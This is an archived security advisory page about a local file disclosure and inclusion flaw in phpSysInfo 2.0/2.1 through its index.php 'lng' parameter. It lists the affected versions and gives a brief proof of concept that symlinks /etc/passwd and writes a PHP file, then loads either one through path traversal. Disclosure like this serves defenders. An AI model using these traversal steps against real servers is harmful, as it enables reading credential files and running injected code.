exploits , vulnerabilities , articles , PHPSysInfo Index.PHP LNG File Disclosure Vulnerability

Title	PHPSysInfo Index.PHP LNG File Disclosure Vulnerability
Published	2003-04-04-12:00AM
Updated	2003-11-24-06:37PM
Class	Unknown
CVE	CVE-MAP-NOMATCH
Remote	No
Local	Yes
Credit	Discovery of this vulnerability has been credited to Albert Puigsech Galicia <ripe@7a69ezine.org>.
Vulnerable	phpSysInfo phpSysInfo 2.1 phpSysInfo phpSysInfo 2.0 Debian Linux 3.0 Debian Linux 3.0 alpha Debian Linux 3.0 arm Debian Linux 3.0 hppa Debian Linux 3.0 ia32 Debian Linux 3.0 ia64 Debian Linux 3.0 m68k Debian Linux 3.0 mips Debian Linux 3.0 mipsel Debian Linux 3.0 ppc Debian Linux 3.0 s/390 Debian Linux 3.0 sparc
Not Vulnerable
Code	The following proof of concept was provided: ~$ ln -s /etc/passwd /tmp/p.php http://www.example.com/index.php?lng=../../../../tmp/p ~$ echo "<?php phpinfo() ?>" > /tmp/p.php http://www.example.com/index.php?lng=../../../../tmp/p
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-22 KVIrc URI Handler Remote Command Execution Vulnerability
• 2008-11-22 NVIDIA Cg Toolkit Installer Insecure Temporary File Creation Vulnerability
• 2008-11-22 TkUsr Insecure Temporary File Creation Vulnerability
• 2008-11-21 TAU Tuning and Analysis Utilities Insecure Temporary File Creation Vulnerabilities
• 2008-11-21 Maildirsync Insecure Temporary File Creation Vulnerability
• 2008-11-21 TkMan Insecure Temporary File Creation Vulnerability
• 2008-11-21 Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability
• 2008-11-21 Cisco IOS and CatOS VLAN Trunking Protocol Packet Handling Denial Of Service Vulnerability
• 2008-11-21 vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
• 2008-11-21 Apple Mac OS X CoreGraphics Multiple Memory Corruption Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 18:29:02 +0000